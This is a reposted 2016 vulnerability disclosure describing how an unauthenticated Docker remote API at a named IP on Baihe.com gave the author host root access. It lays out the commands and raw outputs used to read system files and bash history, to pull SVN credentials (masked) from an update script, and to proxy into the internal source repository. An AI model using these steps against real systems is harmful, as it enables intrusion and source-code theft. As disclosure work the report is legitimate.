神刀安全网

漏洞标题: 新姿势之获取百合网全站源码

漏洞详情

披露状态:

2016-05-18: 细节已通知厂商并且等待厂商处理中
2016-05-23: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

没错,就是全站代码
不要问我为什么这么6,请看我名字

详细说明:

先申明下没有脱代码,可查日志

docker remote api未授权访问

code 区域
http://123.206.30.193:2375

当前image

code 区域
docker  -H tcp://123.206.30.193:2375 images
REPOSITORY TAG IMAGE ID CREATED VIRTUAL SIZE
mysql latest 4f81531a4fa7 2 weeks ago 255.6 MB
docker.baihe.com/nginx 1.8 143b72742691 3 weeks ago 263.3 MB
phpfpm latest c0a91a09e975 3 weeks ago 636.7 MB
docker.baihe.com/php5 latest c0a91a09e975 3 weeks ago 636.7 MB
<none> <none> f2bea71117ab 3 weeks ago 228.9 MB
<none> <none> d397074d70d4 4 weeks ago 228.9 MB
<none> <none> 60e41557d3f3 4 weeks ago 228.9 MB
docker.baihe.com/php5.5 latest 825eb26bb666 4 weeks ago 1.057 GB
docker.baihe.com/php-fpm 6 4ddadfe0897d 5 weeks ago 394.3 MB
<none> <none> a79dfa92a739 6 weeks ago 302.1 MB
centos 6 61bf77ab8841 6 weeks ago 228.9 MB
centos centos6 61bf77ab8841 6 weeks ago 228.9 MB
docker.baihe.com/baiheredis 3.0 0723312bd82e 6 weeks ago 177.5 MB
baihe/redis latest 0723312bd82e 6 weeks ago 177.5 MB
docker.baihe.com/mongo latest 3b43c155fd10 6 weeks ago 309.8 MB
eva/mongo latest 3b43c155fd10 6 weeks ago 309.8 MB
docker.baihe.com/php latest c6cc8696a7cb 8 weeks ago 452.8 MB
eva/php latest c6cc8696a7cb 8 weeks ago 452.8 MB
php 5.6-fpm c6cc8696a7cb 8 weeks ago 452.8 MB
haproxy alpine a49566cd6d57 8 weeks ago 10.63 MB
docker.baihe.com/mysql latest 6863cdbe438e 9 weeks ago 361.2 MB
docker.baihe.com/baihemysql latest b666e9e882a2 9 weeks ago 324.2 MB
mysql 5.6 b666e9e882a2 9 weeks ago 324.2 MB
eva/mysql latest b666e9e882a2 9 weeks ago 324.2 MB
shipyard/shipyard latest a1d73c89bdfa 9 weeks ago 58.67 MB
million12/haproxy latest a5b525064e6c 9 weeks ago 292.8 MB
oblank/docker-centos-nginx-php-mongo-redis-memcached latest df7de2852d68 9 weeks ago 1.64 GB
million12/haproxy 1.6.3-h2 e7bf1090906c 9 weeks ago 292.8 MB
million12/haproxy h2 5d65cd66aede 9 weeks ago 292.8 MB
front-nginx latest 36b0adefb2f3 9 weeks ago 190.5 MB
daocloud.io/nginx latest 36b0adefb2f3 9 weeks ago 190.5 MB
docker.baihe.com/baihenginx latest 36b0adefb2f3 9 weeks ago 190.5 MB
nginx latest 36b0adefb2f3 9 weeks ago 190.5 MB
docker.baihe.com/nginx latest 36b0adefb2f3 9 weeks ago 190.5 MB
docker.baihe.com/centos latest bb3d629a7cbc 10 weeks ago 196.6 MB
centos latest bb3d629a7cbc 10 weeks ago 196.6 MB
docker.baihe.com/redis latest 8d81cd6f6c5e 10 weeks ago 177.5 MB
docker.baihe.com/redis 3.0 8d81cd6f6c5e 10 weeks ago 177.5 MB
eva/redis latest 8d81cd6f6c5e 10 weeks ago 177.5 MB
redis 3.0 8d81cd6f6c5e 10 weeks ago 177.5 MB
redis latest 8d81cd6f6c5e 10 weeks ago 177.5 MB
alpine latest 2a250d324882 10 weeks ago 4.794 MB
rethinkdb latest fa65be256431 10 weeks ago 181.8 MB
eva/memcache latest c9df794a0454 10 weeks ago 132.2 MB
memcached 1.4 c9df794a0454 10 weeks ago 132.2 MB
docker.baihe.com/memcache latest c9df794a0454 10 weeks ago 132.2 MB
swarm latest fd056ae2da24 11 weeks ago 18.11 MB
debian wheezy 43d31a5a4c8c 11 weeks ago 84.88 MB
debian jessie a582cd499e0f 11 weeks ago 125.1 MB
daocloud.io/daocloud/daocloud-toolset latest b232d6774447 12 weeks ago 150.2 MB
docker.baihe.com/php-fpm latest 5b0fca6df07d 3 months ago 365.6 MB
bitnami/php-fpm latest 5b0fca6df07d 3 months ago 365.6 MB
jprjr/centos-php-fpm latest d9fce68c8983 3 months ago 392 MB
docker.baihe.com/dockerui latest 95c8b9dc91e0 3 months ago 6.13 MB
dockerui/dockerui latest 95c8b9dc91e0 3 months ago 6.13 MB
internavenue/centos-nginx latest 8329e9f7189d 3 months ago 589 MB
registry latest 07d93e41c370 3 months ago 422.8 MB
jdeathe/centos-ssh centos-6-1.4.1 19c6a20f72e0 4 months ago 253.2 MB
shipyard/docker-proxy latest 68102ad1785d 4 months ago 9.464 MB
shipyard/deploy latest 1f1b0dc17065 8 months ago 6.514 MB
ehazlett/curl latest fa495a510875 8 months ago 8.727 MB
microbox/etcd latest d7522ca4c973 9 months ago 17.86 MB
shipyard/rethinkdb latest 01d0c7f830ab 11 months ago 296.2 MB
<none> <none> dc2342e12c39 11 months ago 143.8 MB
kriation/centos7 latest 0af989cd52ff 15 months ago 223.1 MB
docker.baihe.com/centos7 latest 0af989cd52ff 15 months ago 223.1 MB

docker.baihe.com 证明为百合网

神奇一键拿docker外层宿主机root

id

code 区域
[[email protected]_15_76_centos ~]# id
uid=0(root) gid=0(root) groups=0(root)

hosts文件也有baihe.com域名

code 区域
[[email protected]_15_76_centos ~]# cat /etc/hosts
127.0.0.1 localhost localhost.localdomain VM_15_76_centos

127.0.0.1 images6.baihe.com
127.0.0.1 images.baihe.com
127.0.0.1 static1.baihe.com
127.0.0.1 static3.baihe.com
127.0.0.1 static4.baihe.com
127.0.0.1 static5.baihe.com
127.0.0.1 static6.baihe.com
127.0.0.1 static8.baihe.com

123.206.30.193 docker.baihe.com
123.206.30.193 shipyard.baihe.com

ifconfig 有内网ip 10.141.15.76

code 区域
[[email protected]_15_76_centos ~]# ifconfig
docker0 Link encap:Ethernet HWaddr 06:60:E6:35:CE:0D
inet addr:172.17.42.1 Bcast:0.0.0.0 Mask:255.255.0.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:4965199 errors:0 dropped:0 overruns:0 frame:0
TX packets:5093629 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:11538564202 (10.7 GiB) TX bytes:7761907034 (7.2 GiB)

docker_new0 Link encap:Ethernet HWaddr 42:7A:77:DD:A3:01
inet addr:192.168.6.1 Bcast:192.168.6.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)

eth0 Link encap:Ethernet HWaddr 52:54:00:76:48:23
inet addr:10.141.15.76 Bcast:10.141.63.255 Mask:255.255.192.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:95319305 errors:0 dropped:0 overruns:0 frame:0
TX packets:51909292 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:24742543618 (23.0 GiB) TX bytes:14247046227 (13.2 GiB)

/home/work目录下文件

code 区域
[[email protected]_15_76_centos ~]# cd /home/work/
[[email protected]_15_76_centos work]# ls -lh
total 892M
drwxr-xr-x 4 root root 4.0K Mar 18 15:37 backup
drwxr-xr-x 4 root root 4.0K Mar 25 16:52 baihe
drwxr-xr-x 3 root root 4.0K Mar 17 15:10 data
drwxr-xr-x 23 root root 4.0K Apr 27 17:13 docker_file
drwx------ 2 root root 16K Mar 16 17:34 lost+found
-rw-r--r-- 1 root root 261M Apr 27 11:07 nginxa.tar
-rw-r--r-- 1 root root 49 Mar 24 10:31 nginxregistry.log
-rw-r--r-- 1 root root 13 Mar 24 10:30 nginx用户名密码.log
-rw------- 1 root root 133K Mar 29 11:20 nohup.out
-rw-r--r-- 1 root root 631M Apr 27 11:18 phpfpm.tar
drwxr-xr-x 3 root root 4.0K Mar 28 14:33 shipyard
-rw-r--r-- 1 root root 36 Mar 24 18:34 shipyard.log
drwxr-xr-x 3 root root 4.0K Mar 18 10:37 static

查看root的.bash_history文件,获取到以下信息

code 区域
/home/work/baihe
/home/work/docker_file/nginx/conf.d
/home/work/docker_file/nginx/nginx.conf

看了代码下发现都是一些静态的html,js,图片等,没有什么有价值的

然后再翻了翻,在/home/work/backup下发现一个sh脚本,看了下是svn自动更新的脚本

里面暴露了svn帐号密码

code 区域
[[email protected]_15_76_centos backup]# cat update.sh
#!/bin/bash
export LANG=zh_CN.UTF-8

echo 'svn update /home/work/backup/static/'
svn update /home/work/backup/static/ --username [email protected] --password *** --no-auth-cache
#cp -fr /home/work/backup/static/* /home/work/baihe/static/

echo 'svn update /home/work/backup/fronthtml/'
svn update /home/work/backup/fronthtml/ --username [email protected] --password ***** --no-auth-cache
#cp -fr /home/work/backup/fronthtml/* /home/work/baihe/fronthtml/

rsync -auv --exclude='.svn/' /home/work/backup/ /home/work/baihe/

find /home/work/baihe -name ".svn" | xargs rm -rf

echo "update success..."
~

进到/home/work/baihe/fronthtml/目录,执行svn info,获取到svn地址

code 区域
http://211.151.58.8:1722/svn

公网可以访问,但是都是返回 200 OK Service ready.

经过测试只有内网才可以访问

做了个代理,用获取到svn帐号密码,成功访问

漏洞标题:  新姿势之获取百合网全站源码

可以看到是全站的代码,包括www,ios,android等,并且都可以访问

再给出几张截图证明

android

漏洞标题:  新姿势之获取百合网全站源码

www

漏洞标题:  新姿势之获取百合网全站源码

ios

漏洞标题:  新姿势之获取百合网全站源码

cms

漏洞标题:  新姿势之获取百合网全站源码

点到为止

漏洞证明:

修复方案:

参考 http://drops.wooyun.org/papers/15892

可否来个礼物?

版权声明:转载请注明来源 黑客,绝对是黑客@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 新姿势之获取百合网全站源码

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址